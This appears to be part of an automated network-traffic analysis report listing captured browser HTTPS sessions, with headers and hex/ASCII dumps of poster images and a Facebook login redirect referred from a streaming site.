                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 07 Sep 2044 23:31:11 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2452759
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100026-IAD, cache-ewr-kewr1740030-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df 6b e6 d8 38 00 d3 26 ad 14 4a ca 38
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5k8&J8
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: a4 f4 ba 18 67 26 87 12 89 c4 96 c7 a1 50 66 de 66 6e 53 c3 95 bf cb 49 ea 22 4b 1c de 8f 75 92 4f e4 09 8e 62 d4 da bb 99 d1 84 5b a8 2f b2 da d5 ae 09 83 f5 29 e5 a5 43 9f 71 1d ce f3 88 6a 81 fa 48 1c e6 a2 aa 3e fa 00 3b 01 2e 91 50 e5 8e 54 f9 41 1c 09 25 83 be 17 2c d2 e3 ab 08 c0 ac bd 14 d1 ab ba b5 7e 76 04 a7 1a cc ac aa fd 2d 62 82 43 57 8b ec 46 e2 d5 5a c9 15 00 dd 4d c9 b9 63 dd d7 63 67 8a 9f 50 86 7f 43 77 c8 7a de 57 68 41 ba b5 9f 4b 90 ef dc f8 b0 ba 9e 7c bc b4 2d b4 e8 e2 88 c6 4e af b3 2e c1 89 f4 2a fc b7 69 65 56 5c 1a 81 f2 56 dc 46 68 78 4a 19 60 a9 ae bd 4f a9 97 25 a4 b6 c6 f4 58 39 78 c4 05 8c fa 12 49 a2 75 aa f9 ed ef 9b 76 c2 12 e1 81 d2 52 e4 56 a8 91 9f a0 22 99 c2 49 d9 f3 3d 1f 25 15 62 e8 f5 f0 53 df 19 bf d4 ad 3b bf
                                                                                                                                                                                          Data Ascii: g&PffnSI"KuOb[/)CqjH>;.PTA%,~v-bCWFZMccgPCwzWhAK|-N.*ieV\VFhxJ`O%X9xIuvRV"I=%bS;
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: e4 b9 d7 5a e6 fa 1d 2a e3 7f 41 8e 9c 5f 90 e7 a2 8e 8f 3c 73 dc a9 11 b8 bc 59 43 d6 d4 9e cc f6 58 d8 8e bb f3 79 a5 3d d4 e8 ff 00 49 42 73 0c 4b a5 3d 6d fc 1c 55 11 a6 a5 c3 92 3e ae 02 dc b3 58 65 6a ad f2 52 d5 61 12 6a 4a 28 d6 25 45 7a a6 67 61 72 c8 64 71 6e 74 e8 10 ce 37 b9 d7 03 a2 cb 8a a7 95 6b a4 0a 2d 78 7c 49 8e f7 2c b8 5b 24 2d 82 c1 37 23 e0 70 ec dc 5e aa 4f 3a df 75 53 eb 3a 97 91 c7 91 12 25 3f 7d 2c 6a ef df 77 29 df be 5e 75 1f 7d ce 52 fe f9 bc a6 be f9 ca e4 8f be 6a c8 73 ef 98 f4 a7 ef 98 ae b9 f7 dc bc 6f ef 91 51 f7 df 72 2d cf be 63 be 4f df 35 7e 63 ef 95 a9 e7 df 37 bb 17 ef 97 98 5f df 39 a9 87 f7 ce 4f ff c4 00 30 10 00 02 01 03 03 02 06 02 03 00 02 02 03 00 00 00 01 02 03 00 04 11 12 13 21 05 31 10 14 20 22 32 41 23
                                                                                                                                                                                          Data Ascii: Z*A_<sYCXy=IBsK=mU>XejRajJ(%Ezgardqnt7k-x|I,[$-7#p^O:uS:%?},jw)^u}RjsoQr-cO5~c7_9O0!1 "2A#
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 4e 1e b5 06 01 96 e6 db 49 2f 18 3a bb 62 a1 ba 92 0f 8c 1d 49 24 ef 7c f8 85 aa 10 ac e0 35 d5 b4 71 28 2b 51 46 5c 36 01 c6 08 b9 9b 7a 46 71 0f 94 d2 ba a2 b8 80 00 89 d5 07 bd 0d 47 df c0 b7 d5 01 f6 58 eb 20 55 cc 5b 52 3a d3 54 7d 41 24 1a 27 b9 48 94 8d a1 21 8b de b1 a6 da 2a 8b c0 36 a4 cc 49 b6 aa be 8c d1 a2 71 dc be b2 65 a9 06 39 ae f5 04 e6 1a 66 0d c8 9a dc 3f 20 e5 38 61 fe d6 2b 74 f0 a7 22 87 7c 09 2d 65 5d 20 f4 e1 b7 2b 2b 5c db 18 9f 4a 8b 29 ab c9 4d 51 40 eb 24 7a ba 84 0d 28 5d 26 09 22 20 b6 45 28 cf 0b 2d 9c 85 6a 3b 29 43 29 ab fb 73 2e 96 45 b0 95 88 06 5b 29 63 ac 1a 82 d1 99 93 73 cf c2 e7 48 bc f7 7b 7d 77 97 3b e7 4a a9 db 3c f6 e2 88 c7 82 92 39 0b 20 7a 61 f5 4d 68 0e 0c 6d 94 f6 b4 66 b7 04 7e ea 96 4d c4 d6 b0 76 c1 b6
                                                                                                                                                                                          Data Ascii: NI/:bI$|5q(+QF\6zFqGX U[R:T}A$'H!*6Iqe9f? 8a+t"|-e] ++\J)MQ@$z(]&" E(-j;)C)s.E[)csH{}w;J<9 zaMhmf~Mv
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 95 69 25 13 1d a1 3c 26 26 c3 b1 7f eb ce 4a d4 d2 e0 7e 28 7a 6c 51 28 06 1b 78 e1 72 e9 d4 2d 9a 0e 2b 18 e3 c6 ea 33 81 50 c8 0f 02 3f af 56 bd c3 aa a0 84 cc e1 04 68 23 01 56 44 12 2b 29 f3 8a 84 a4 92 5f a2 8f 6a 45 e6 b7 59 d8 fb bc 2c c6 84 06 a5 b8 2b ee a9 0a c0 14 47 5c d2 e7 ec 9a 03 43 63 c6 75 2c bc 79 53 26 25 02 09 31 c4 4d b0 0d 5b 92 ef 12 1a 3f 13 5d 5e 4d 22 11 49 d4 32 70 63 7d 60 1a 2c 07 77 9d 22 c6 a5 03 4e a3 e6 94 60 52 b6 7c 0f 85 c1 e3 4f 87 4e 83 6d 35 78 75 1b ad a5 d0 b4 e3 8a 86 5d b6 e6 7b 6d 67 5a b4 6f 8c 52 af 01 6a 09 a2 b7 12 35 08 35 f3 27 6f 44 bf 28 05 16 03 02 b3 e1 0d b1 cb 68 10 ce 2b 72 65 f9 58 65 da 46 24 e2 9f 8d 02 af db 55 c0 14 f0 a7 39 b6 77 23 dd 76 ec 8d 9a 8e dc 63 94 84 a3 d1 b7 5c ce a2 07 0a be 89
                                                                                                                                                                                          Data Ascii: i%<&&J~(zlQ(xr-+3P?Vh#VD+)_jEY,+G\Ccu,yS&%1M[?]^M"I2pc}`,w"N`R|ONm5xu]{mgZoRj55'oD(h+reXeF$U9w#vc\
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 4d 2e 49 66 f8 07 35 22 80 91 9f 1e 9b ff 00 c8 8a 9e 74 4e 08 63 dd b5 0a b7 b2 88 c6 0b 34 aa 8f cf 50 97 45 bc 84 11 8f 07 fc 36 02 ac a2 de b8 85 6b ca c4 c3 4d 2d aa b1 f6 c3 d3 a1 87 24 dc db c5 b6 e4 4d 6c df 3a 31 e8 3c a9 dc 0c 95 6d 6a b1 61 63 f2 2f e9 70 1b 19 69 74 ad 5c db 28 8d f1 9a 8e d9 dc 6b a9 6d 59 63 d4 54 68 cc 66 bb ea 5a d1 a0 e0 75 11 aa 31 20 e9 f0 47 3c 11 46 6e fa 31 57 93 6a 1e 95 2c cd a4 4b d2 da d8 e2 4c 24 79 02 dc 21 64 0d 3d e5 b6 15 05 b4 d1 49 9d b8 57 42 e2 ba 9a 3c c6 18 51 3a 42 0f 9b f4 d8 31 5d 52 06 da 89 17 a2 2e a9 e4 6a 93 4b 7b 19 c0 f6 b3 e3 3d 81 e7 06 44 59 46 1e f6 d6 21 0b d5 ac 1b 23 2c c4 48 31 4c 70 09 ad 59 e6 94 fc bc 3b 9a 7b e2 0b 66 de d2 49 21 1b b7 4c ad 14 f1 04 b3 0b a5 a7 de 05 c4 95 3c f1
                                                                                                                                                                                          Data Ascii: M.If5"tNc4PE6kM-$Ml:1<mjac/pit\(kmYcThfZu1 G<Fn1Wj,KL$y!d=IWB<Q:B1]R.jK{=DYF!#,H1LpY;{fI!L<
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 45 29 49 c8 9d da bd 78 e9 45 14 30 6b e1 1e 49 65 92 dd 86 78 c6 92 e4 e7 99 ff 00 c3 a2 01 1b 43 17 44 e3 38 ce 33 8c e3 38 fc 31 21 49 12 47 73 61 33 73 4b 56 93 c3 2c 52 43 56 18 22 f6 f2 09 61 8c 75 02 64 66 2a 0c f1 81 c9 f0 c0 f2 17 59 f4 cb 14 52 cf 36 b2 af 8e bf 73 c6 3d e9 1e cc 9d 40 e0 01 9c 7e 38 fc 9f c7 91 39 e3 0b aa fd b5 50 dd 88 35 a0 07 e1 42 23 97 32 88 23 40 d2 26 de 98 90 36 09 23 75 e7 15 15 54 04 63 c2 93 89 1a b9 03 38 ce 33 8f c4 96 44 6a 48 4f 50 44 4f 12 2c 8a eb d9 0f c0 cf e3 61 23 39 94 bc 71 ac 8c c1 0b 88 61 a5 04 dc 22 d9 02 bb 48 30 c8 d2 b9 38 aa 49 ec 7c a7 c4 20 04 ba c8 22 92 c9 74 a6 55 35 f1 30 90 2e 71 9c 7e 2d 6f 26 32 b2 c5 53 65 d0 f8 e4 9f 5c b2 fe e8 b4 6c c2 7b c3 fe 62 6f 1b 47 32 48 3c 45 32 1a 0e 64 11
                                                                                                                                                                                          Data Ascii: E)IxE0kIexCD8381!IGsa3sKV,RCV"audf*YR6s=@~89P5B#2#@&6#uTc83DjHOPDO,a#9qa"H08I| "tU50.q~-o&2Se\l{boG2H<E2d
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: c1 c0 1d 72 fa 4a c2 35 8c c1 24 6e 15 e4 b1 24 cf dd ea eb 63 95 18 c9 37 a1 89 97 bd 6a ba 18 eb bc a1 7c 3e e6 fd 85 75 32 ad d3 1d 75 dc d5 8a cf 95 76 d4 ed d9 8a b9 d7 4b 04 b1 c6 3c aa 32 bd 36 98 b7 51 ae 9c 7c 93 aa 9f 8e f8 35 56 18 76 c1 ae 9f e7 2a d1 30 a1 ed 2f ac ac 30 01 4f ab 2f 10 38 7d dc f3 bf 69 7d f2 8e 3b b6 d2 68 fe 20 5d fd 84 1c 29 f5 15 a3 f3 87 7f 73 e7 af 89 3b 19 15 ec 22 80 a9 4f 69 6a bf 97 c5 2e ee 76 54 12 d7 b8 ef d8 b3 ee e5 80 29 ae 3d 43 74 37 7c ff 00 91 5d 6f d4 a6 ee ea fc 29 df 5e e7 9c 3e a3 be 7e d9 fe 70 11 fd 9b 4a 0f e8 6e c8 47 03 cb 2b e7 b6 7e 39 6e 90 2f c9 3e 02 49 ce d1 e0 70 3e 81 2c 3a a9 ac c5 8e 45 58 a4 32 73 20 71 c0 4f 39 1f 04 b8 c2 73 9f c1 fb f9 e7 f3 ce 73 84 e7 85 f8 e7 3c 4c 7e 33 c4 d8 16
                                                                                                                                                                                          Data Ascii: rJ5$n$c7j|>u2uvK<26Q|5Vv*0/0O/8}i};h ])s;"Oij.vT)=Ct7|]o)^>~pJnG+~9n/>Ip>,:EX2s qO9ss<L~3
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 96 5f 55 59 35 18 b1 7a eb 43 72 90 13 76 b1 42 af e2 09 79 34 e0 11 36 ec 6b cc 5d 95 aa c8 c7 bd 9d 3a 04 e2 a2 3f 38 cb 3a 24 58 2e e7 6a 99 d6 b2 68 3d 28 c1 54 cf d1 90 e7 fb 0d de 2f 4a 78 22 d7 f8 ed 65 dc 5b 40 a2 0f 64 a1 9b b6 e5 f6 de ec 5a 0d c6 2b 5d ad 25 aa 7d 65 f9 ce 50 f2 07 d2 03 80 42 4e cb 0a c3 ab 12 56 26 13 12 b2 e2 a2 03 ac 8f 78 7e ef d6 3d cf 55 b5 1b 2a 66 4b 39 9c f2 2d 2f 60 8b c1 5b 6a ea a5 ca b5 bb 58 ba 12 6c 97 0f 5e 55 62 e3 04 fa 2d 3b 8b 4a 96 7a ec 6a ec 56 9f de a8 d7 29 e0 c4 ef 50 f6 55 ad 93 1c 7c 7d 20 26 7a 04 02 a1 61 03 16 6d fb 59 3c 6b 9c d0 68 b5 55 ad 93 13 ca ae 69 82 d0 80 4d 6d 6d 4d 78 fa d3 0f 89 9e 27 77 66 22 a4 a2 3f 42 f8 8c d7 2d 94 1f ec 80 b0 9b 01 27 13 a7 b6 c1 37 0d 54 14 bc 22 36 95 17 61
                                                                                                                                                                                          Data Ascii: _UY5zCrvBy46k]:?8:$X.jh=(T/Jx"e[@dZ+]%}ePBNV&x~=U*fK9-/`[jXl^Ub-;JzjV)PU|} &zamY<khUiMmmMx'wf"?B-'7T"6a
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 24 e7 23 85 bd ca 1a f5 99 54 53 ac e8 4c 58 86 34 20 c8 da 39 a9 e3 42 7b 94 10 c2 36 2f ea 45 d7 05 6a 94 30 ae cd e1 b2 c8 96 36 2f a4 db ad 6a c1 21 fc bf 0a 20 11 70 a2 60 ff 00 c6 48 be 3e 54 4f 9a 63 87 72 08 76 21 bb e8 56 1a 67 c1 2b 85 a7 96 0f 13 4b 3b 59 82 b0 ef 1f 0a cb 6d 59 50 fa 82 a4 47 a2 ac 25 19 88 43 f0 56 3e e5 da 39 37 50 71 54 82 1e 2b 47 35 fb b9 2a 0a 95 62 f2 fb e0 38 a2 e1 2f 9c 0f 2a 91 4d 76 28 76 c8 9d 4a 9d 9c 0c 38 7d 61 33 d4 b0 50 d7 31 f9 56 20 cf 62 a8 56 79 7a b4 23 23 51 62 b4 a1 5a a9 4a 88 38 3b 90 68 77 95 7f 09 2f 17 b9 9e e5 53 d3 95 41 6a 0f 9c d3 62 a9 50 eb a0 51 6a 1c d4 3a cc d7 9a 21 bb 28 f0 c1 7c 30 fd a1 fd ff 00 d8 4d ea 6c d5 80 b3 da a7 0d f7 20 f0 9a dc 84 ef a2 1a ea 7b c4 82 14 38 f1 1e b4 a2 f7
                                                                                                                                                                                          Data Ascii: $#TSLX4 9B{6/Ej06/j! p`H>TOcrv!Vg+K;YmYPG%CV>97PqT+G5*b8/*Mv(vJ8}a3P1V bVyz##QbZJ8;hw/SAjbPQj:!(|0Ml {8


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          121192.168.2.1649854157.240.195.354436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC641OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp HTTP/1.1
                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1999INHTTP/1.1 400 Bad Request
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.google-analytics.com *.google.com;style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline' https://fonts.googleapis.com;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com https://*.google-analytics.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com https://fonts.gstatic.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net connect.facebook.net *.carriersignal.info blob: androi [TRUNCATED]
                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          2024-12-15 11:38:15 UTC950INData Raw: 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 30 0d 0a 72 65 70 6f 72 74 69 6e 67 2d 65 6e 64 70 6f 69 6e 74 73 3a 20 63 6f 6f 70 5f 72 65 70 6f 72 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 2f 63 6f 6f 70 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 2c 20 64 65 66 61 75 6c 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 61 6a 61 78 2f 62 72 6f 77 73 65 72 5f 65 72 72 6f 72 5f 72 65 70 6f 72 74 73 2f 3f 64 65 76 69 63 65 5f 6c 65 76 65 6c 3d 75 6e 6b 6e 6f 77 6e 26 62 72 73 69 64 3d 37 34 34 38 36 30 31 35 35 34 36 39 34 32 36 39 34 37 30 22 0d 0a 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30
                                                                                                                                                                                          Data Ascii: X-XSS-Protection: 0reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7448601554694269470"report-to: {"max_age":25920
                                                                                                                                                                                          2024-12-15 11:38:15 UTC2805INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 70 72 6f 78 79 3d 22 41 63 49 61 71 4a 66 39 5f 6e 48 46 4c 75 34 44 66 49 4e 70 68 37 52 54 47 35 77 36 73 4f 66 37 38 6c 48 53 6a 47 4d 6b 58 65 6c 5a 75 68 4e 5f 36 65 58 55 58 51 4e 59 39 43 73 41 77 47 34 76 54 53 69 70 39 6c 54 70 5a 4a 4d 75 43 54 55 35 59 54 79 70 22 3b 20 65 5f 66 62 5f 62 69 6e 61 72 79 76 65 72 73 69 6f 6e 3d 22 41 63 4c 6c 31 56 57 58 74 46 47 50 61 36 63 30 58 69 4f 4f 43 6c 66 76 61 34 64 6c 33 76 43 45 65 58 70 7a 6d 67 41 42 4e 36 36 39 2d 56 52 68 46 69 6b 59 5f 45 62 54 63 6e 78 50 53 69 34 57 47 58 5f 45 72 71 36 66 5a 69 6b 53 66 6b 4c 55 62 45 45 57 62 48 4f 4f 56 46 4f 6a 2d 62 65 5a 35 6d 41 22 3b 20 65 5f 66
                                                                                                                                                                                          Data Ascii: Proxy-Status: http_request_error; e_proxy="AcIaqJf9_nHFLu4DfINph7RTG5w6sOf78lHSjGMkXelZuhN_6eXUXQNY9CsAwG4vTSip9lTpZJMuCTU5YTyp"; e_fb_binaryversion="AcLl1VWXtFGPa6c0XiOOClfva4dl3vCEeXpzmgABN669-VRhFikY_EbTcnxPSi4WGX_Erq6fZikSfkLUbEEWbHOOVFOj-beZ5mA"; e_f
                                                                                                                                                                                          2024-12-15 11:38:15 UTC5INData Raw: 36 30 36 0d 0a
                                                                                                                                                                                          Data Ascii: 606


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          122192.168.2.1649862151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:15 UTC644OUTGET /images/M/MV5BMTQ3NjU1NjU1Ml5BMl5BanBnXkFtZTcwODIxNzYxMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:15 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 25107
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 53dd02c4-caf2-4ca7-81c8-9371ec9368da
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 15 Mar 2008 05:31:45 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 13 Nov 2044 17:39:10 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 439508
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:15 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200127-IAD, cache-ewr-kewr1740066-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 07 00 04 05 06 01 02 03 08 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 9f 67 15 5c ac 8b cf f3 4a 55 17 30 80 e3
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3g\JU0
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: f2 d6 62 d5 67 1d cf e7 bc 0e 8b 6d 72 77 2f 5d 7e d5 9c a4 12 b9 72 f4 98 38 d5 17 1f 40 ff 00 bc 35 c7 b7 9e f7 0f 04 b9 77 c0 40 82 3e ed e2 4b 1a f4 e1 6d f4 0f 94 f6 e7 e8 f4 00 72 0f a5 cb d7 dc 26 f7 9e 32 ae b1 3a 6e f7 8b 8c ed cc 94 3b f9 65 dd c7 71 9b 95 a6 59 e7 f5 81 35 43 ac 16 fc ce d9 61 30 eb 7d 76 5c 2c f2 1d 6d a6 cb d6 72 13 ac d9 11 e0 ed ae 3b 5d b9 52 e6 13 bc 35 ac 75 ac 76 8d db 5d 71 58 ca 4c a5 b0 e2 d7 5e 7c dc b2 64 fa 6d e4 bb 59 09 d3 8f 0c 4a ca ef bf 58 1c eb 7b 2d 76 50 de 6a b9 33 60 39 9f 46 7d 3c 98 e6 e3 09 cb ae 9a af 4e 7d ba 9c 7b b3 ee af e3 1e c7 0f a5 5e 58 33 d9 b5 fa 16 cd cb ad 7c 4a 53 11 6f 11 89 2e 9e 55 9d 7b 98 79 97 ad 77 9a 63 97 4b 47 0e 6c b3 b9 0d da 5a 17 a6 fb 73 e7 d3 8f 3e ea c8 e9 c8 97 89 dd
                                                                                                                                                                                          Data Ascii: bgmrw/]~r8@5w@>Kmr&2:n;eqY5Ca0}v\,mr;]R5uv]qXL^|dmYJX{-vPj3`9F}<N}{^X3|JSo.U{ywcKGlZs>
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 5b 40 ae 9a 0a 5b 6f a2 b1 02 2e 45 bf 33 03 91 7b f5 1a 9f 57 69 bb a1 3d 50 57 2a fd 3b 35 00 94 6b 6e e9 2d 38 b7 6d 77 50 0e 4d 46 d3 56 46 a4 23 67 a8 ab 4b 14 5f ea 5c 06 e1 b8 f5 d8 b9 26 16 7c 76 ad d9 ae c9 4d 43 5d d5 b8 bd d2 cc 97 6d 4a 62 de 72 05 a0 e3 62 a8 b1 6a b6 ea 3a c0 3a b6 39 ab 21 96 af 56 4f c9 11 dd 76 33 63 d4 a2 bc 77 e4 22 fd 2b 2f bd 69 b1 4b 62 fe 95 5a 5b 6d 8b 94 51 6e a6 f0 31 5a b8 97 07 a3 1a a9 68 09 59 db c4 32 37 f4 91 85 a3 a7 7d 73 a8 35 15 cb 7e 87 9a 17 5c 34 99 f8 68 29 da 30 dd 2a 6c 85 35 5a 45 36 d6 fc 46 ae 9f 4f a5 90 83 27 a4 55 ec a6 c7 ea 32 dc 06 48 c8 7e 1b 95 5d 0d 7e fe 15 77 47 eb c8 b1 3a 8f d2 37 6a bd f5 9c 23 2e aa aa b9 1e ed b5 f4 cc cd ce a6 db 58 ca b2 43 55 92 ac fa 56 a2 a7 c2 76 b3 aa 5a
                                                                                                                                                                                          Data Ascii: [@[o.E3{Wi=PW*;5kn-8mwPMFVF#gK_\&|vMC]mJbrbj::9!VOv3cw"+/iKbZ[mQn1ZhY27}s5~\4h)0*l5ZE6FO'U2H~]~wG:7j#.XCUVvZ
